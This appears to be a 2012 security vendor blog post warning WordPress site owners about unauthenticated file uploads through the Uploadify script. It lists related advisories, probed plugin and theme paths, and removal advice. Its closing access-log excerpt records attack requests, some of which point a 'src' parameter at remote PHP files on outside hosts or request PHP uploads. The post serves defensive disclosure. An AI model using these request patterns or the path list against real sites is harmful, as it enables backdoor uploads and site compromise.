The Latest in IT Security

We are seeing a lot of noise again regarding the Uploadify script vulnerabilities affecting some WordPress themes/plugins. If you are not familiar, Uploadify allows anyone to upload anything they want to your site without any authentication.

Very very useful, no? Maybe, but at what cost? If a bad guy/gal knows that you have the Uploadify script, they can upload anything they want too (backdoors) and hack your site.

First, Uploadify is nothing new. When we were reporting on the TimThumb vulnerabilities, we were also notifying everyone about the issues with uploadify.

Been Around

1. In October of 2011 we warned everyone to remove and check for Uploadify: Remove Unused/Testing/Debug Software From Your Site
2. We put out a post in August of 2011 listing themes affected by TimThumb, we also listed the ones Using uploadify as unsafe: Timthumb Security Vulnerability – List of Themes
3. An oldie but goodie, TimThumb (Tip of the Iceberg), Uploadify was also included

   This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.

Latest Reports

When this was all confirmed months ago, we started automatically removing the Uploadify vulnerability for all our customers. However, it is still an issue for everyone else. Here are some of the latest reports of Uploadify related vulnerabilities:

2012-06-13 WordPress plugin Foxypress uploadify.php Arbitrary Code Execution
2012-06-11 ClanSuite 2.9 Arbitrary File Upload Vulnerability
2012-06-05 WordPress Foxypress Plugin 0.4.1.1 – 0.4.2.1 Arbitrary File Upload
2012-06-05 WordPress HTML5 AV Manager Plugin 0.2.7 Arbitrary File Upload
2012-06-05 WordPress WP Marketplace Plugin 1.5.0 – 1.6.1 Arbitrary File Upload Sammy FORGIT
2012-06-05 WordPress WP-Property Plugin 1.35.0 Arbitrary File Upload
2012-05-25 appRain CMF Arbitrary PHP File Upload Vulnerability
2012-05-25 cPassMan v1.82 Remote Command Execution Exploit
2012-05-23 WordPress Kish Guest Posting Plugin 1.0 Arbitrary File Upload
2012-01-19 appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit

There are many more themes/plugins out there using it, and many sites that can easily get compromised through it. This is a small list of the ones being scanned in the wild:

Note: The list below does not conclude that these plugins and themes are vulnerable. The list outlines active scans seen looking for the script in various plugins and themes.

/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
/wp-content/plugins/1-flash-gallery/upload.php
/wp-content/themes/zcool-like/uploadify.php
/third-party/uploadify/uploadify.php
/lib/uploadify/custom.php
/wp-content/plugins/html5avmanager/lib/uploadify/custom.php
/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
/wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php
/wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
/wp-content/themes/aim-theme/lib/js/old/uploadify.php
/wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
/wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
/wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php
/wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
/wp-content/plugins/comments_plugin/uploadify/uploadify.php
/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
/wp-content/plugins/doptg/libraries/php/uploadify.php
/wp-content/plugins/pods/js/uploadify.php
/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
/wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
/wp-content/plugins/wp-symposium/uploadify/uploadify.php
/wp-content/plugins/uploader/uploadify.php
/wp-content/plugins/uploadify/includes/process_upload.php
/wp-content/plugins/very-simple-post-images/uploadify/uploadify.php

What to do

Yes, we are seeing many Uploadify scans in the wild and sites getting compromised to it. If you have any of the themes/plugins we mentioned, we recommend deleting or disabling the uploadify script immediately. We also recommend doing a garage cleaning of your websites and servers, and delete any unused themes/plugins, since they can be compromised even if not in use.

Scans in the wild

Some of the Uploadify scans we are seeing in the wild:

108.167.131.89 – – [26/Jun/2012:08:06:37 +0000] “GET /wp-content/themes/zcool-like/uploadify.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1” 404 7989 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4″91.201.64.85 – – [15/Apr/2012:12:04:45 +0000] “GET /wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php HTTP/1.1” 404 11878 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”200.98.151.118 – – [01/Jun/2012:05:47:15 +0000] “GET /wp-content/themes/pronto/cjl/pronto/uploadify/check.php?src=http://wordpress.company.clubmarutichile.cl/2.php HTTP/1.1” 404 9383 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6″169.244.30.65 – – [07/Jun/2012:07:11:58 +0000] “GET /lib/uploadify/custom.php HTTP/1.0” 404 9187 “-” “Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00″78.85.9.30 – – [07/Jun/2012:16:28:39 +0000] “POST /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php HTTP/1.1” 404 9290 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:42 +0000] “POST /wp-content/themes/aim-theme/lib/js/old/uploadify.php HTTP/1.1” 404  9239 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:44 +0000] “POST /content/plugins/annonces/includes/lib/uploadify/uploadify.php HTTP/1.1” 404 9275 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:45 +0000] “POST /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php HTTP/1.1” 404 9352 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:46 +0000] “POST /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php HTTP/1.1” 404 9290 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:48 +0000] “POST /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php HTTP/1.1” 404 9257 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:50 +0000] “POST /wp-content/plugins/comments_plugin/uploadify/uploadify.php HTTP/1.1” 404 9282 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”78.85.9.30 – – [07/Jun/2012:16:28:51 +0000] “POST /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php HTTP/1.1” 404 9308 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”